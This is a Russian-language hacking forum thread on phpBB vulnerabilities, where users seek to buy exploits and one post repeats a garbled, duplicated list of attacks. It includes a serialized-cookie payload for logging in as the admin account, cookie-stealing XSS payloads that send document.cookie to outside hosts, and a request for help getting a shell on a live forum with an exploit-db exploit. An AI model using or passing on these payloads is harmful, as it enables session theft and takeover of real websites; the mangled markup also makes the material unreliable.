HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 07.01.2017, 21:24
dragondragon
Guest
Сообщений: n/a
Провел на форуме:
27386

Репутация: 0
По умолчанию

под

3.0.14 phpbb

нет ни у кого уязвимости, могу купить, в лс
 
Ответить с цитированием

  #112  
Старый 01.07.2017, 13:14
r00t_hack
Guest
Сообщений: n/a
Провел на форуме:
2595

Репутация: 0
По умолчанию

thanks
 
Ответить с цитированием

  #113  
Старый 03.07.2017, 17:25
ex'pert
Guest
Сообщений: n/a
Провел на форуме:
6871

Репутация: -3
По умолчанию

Цитата:
Сообщение от dragondragon  
dragondragon said:

под
3.0.14 phpbb
нет ни у кого уязвимости, могу купить, в лс
Присоединяюсь. Если что стучите в ЛС. Версия такая же интересует форума
 
Ответить с цитированием

  #114  
Старый 25.10.2017, 19:08
Katrin58
Guest
Сообщений: n/a
Провел на форуме:
756

Репутация: 0
По умолчанию

[QUOTE="qBiN"]
qBiN said:

Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии
2.0.4
, т.к. версии младше, обсуждать нет смысла.
[B]phpBB [/COLOR]
"
Где

- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "
ping test.com
"),

- папка где находится сам форум (например если у нас
http://123.123.123.123/forum/index.php
, вместо

пишем forum),

- ID пользователя.
Video:
http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где

URL сайта

- директория

- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где

- ip сервера,

- директория в которой находится форум

номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например
http://site.com/phpBB/
, - нужная команда (о командах читаем тут
/threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
Код:
Code:
" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="'
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[url=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/url][/COLOR][/COLOR] 
[B]phpBB ' onmouseover='alert(document.location="/"+document.cookie)' X=' antichat.ru
[/CODE]
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[email=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/email][/COLOR][/COLOR] 
[B]phpbb [/COLOR]
"
Где

- ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "
ping test.com
"),

- папка где находится сам форум (например если у нас
http://123.123.123.123/forum/index.php
, вместо

пишем forum),

- ID пользователя.
Video:
http://video.antichat.net/videos/kez/phpbb_206_sql2.rar
[B]phpBB Advanced->Cookies[/I]
),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
"
Video: -
[B]phpBB [/COLOR]
"
Где

URL сайта

- директория

- нужный нам пользователь
Video: -
[B]phpBB \r\n"
Где

- ip сервера,

- директория в которой находится форум

номер существующего топика.
Video: -
[B]phpBB "
Где - ссылка до форума например
http://site.com/phpBB/
, - нужная команда (о командах читаем тут
/threadnav7345-1-10.html
).
Video: -
[B]phpbb " onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X=" H A L L O
[/CODE]
Код:
Code:
" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="'
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[url=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/url][/COLOR][/COLOR] 
[B]phpBB ' onmouseover='alert(document.location="/"+document.cookie)' X=' antichat.ru
[/CODE]
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.[email=http://wj.com/style=display:none;background:url(javascript:alert()) ]wj[/url][/email][/COLOR][/COLOR] 
[B]phpbb
 
Ответить с цитированием

  #115  
Старый 06.08.2022, 10:23
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Добрый какие есть варианты залиться на php 3.0.2.0 (PHP 5.4.45)

шаблоны недоступны (ничего заливать не дает в плане стилей - из бд беруться)

Права администратора

Из модулей:

Код:
Code:
phpbb/viglink (1.0.0)
phpbbmodders/banhammer (1.0.0)
cleantalk/antispam (4.7)
Пробовал phar но что то не получилось (не особо понял как он работает((

При попытке выполнить: https://www.exploit-db.com/exploits/46512

Ругается на ....[1]

 
Ответить с цитированием

  #116  
Старый 07.08.2022, 16:12
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

При попытке выполнить:
https://www.exploit-db.com/exploits/46512
Вот здесь вкратце описывал, что нужно делать. Судя по ошибке на скрине, скрипт эксплоита не может выдрать соль из ответа. Возможно от версии к версии пляшет вёрстка или нейминг, либо WAF блочит запрос. Лучшим вариантом будет установить эту верисю двига локально и воспроизвести все действия вручную и потом отдебажить эксплоит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости. Обсуждения. 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ